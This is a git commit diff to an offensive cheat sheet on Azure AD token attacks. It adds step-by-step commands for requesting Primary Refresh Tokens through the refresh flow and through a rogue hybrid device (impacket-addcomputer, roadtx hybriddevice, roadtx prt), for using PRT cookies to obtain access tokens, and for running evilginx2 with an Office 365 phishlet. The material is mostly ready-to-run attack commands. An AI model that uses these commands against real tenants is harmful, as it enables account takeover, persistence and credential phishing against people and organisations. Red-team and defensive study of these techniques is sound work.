Fix markdown typo
parent
8a4e7f82ae
commit
ce9e94fe47
|
@ -114,25 +114,28 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
|
||||||
* No method known to date.
|
* No method known to date.
|
||||||
|
|
||||||
|
|
||||||
### Use PRT cookie
|
### Request a PRT using the Refresh Flow
|
||||||
|
|
||||||
* `roadrecon auth prt-init`
|
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
|
||||||
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof)
|
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
|
||||||
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug`
|
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
|
||||||
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
* Then browse to [login.microsoftonline.com ](login.microsoftonline.com ) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
|
||||||
|
|
||||||
|
|
||||||
### Request a PRT with Hybrid Device
|
### Request a PRT with Hybrid Device
|
||||||
|
|
||||||
Requirements:
|
Requirements:
|
||||||
|
|
||||||
* ADDS user credentials
|
* ADDS user credentials
|
||||||
* hybrid environment (ADDS and Azure AD)
|
* hybrid environment (ADDS and Azure AD)
|
||||||
|
|
||||||
Use the user account to create a computer and request a PRT
|
Use the user account to create a computer and request a PRT
|
||||||
|
|
||||||
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
||||||
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
||||||
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
||||||
* Get a PRT with device claim
|
* Get a PRT with device claim
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
||||||
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
||||||
|
@ -157,3 +160,4 @@ Use the user account to create a computer and request a PRT
|
||||||
|
|
||||||
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
||||||
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
||||||
|
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)
|
|
@ -102,7 +102,7 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
|
||||||
|
|
||||||
## Phishing with Evilginx2
|
## Phishing with Evilginx2
|
||||||
|
|
||||||
* Run `evilginx2` with o365 phishlet
|
* Run [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) with o365 phishlet
|
||||||
```powershell
|
```powershell
|
||||||
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
|
||||||
: config domain username.corp
|
: config domain username.corp
|
||||||
|
|
Loading…
Reference in New Issue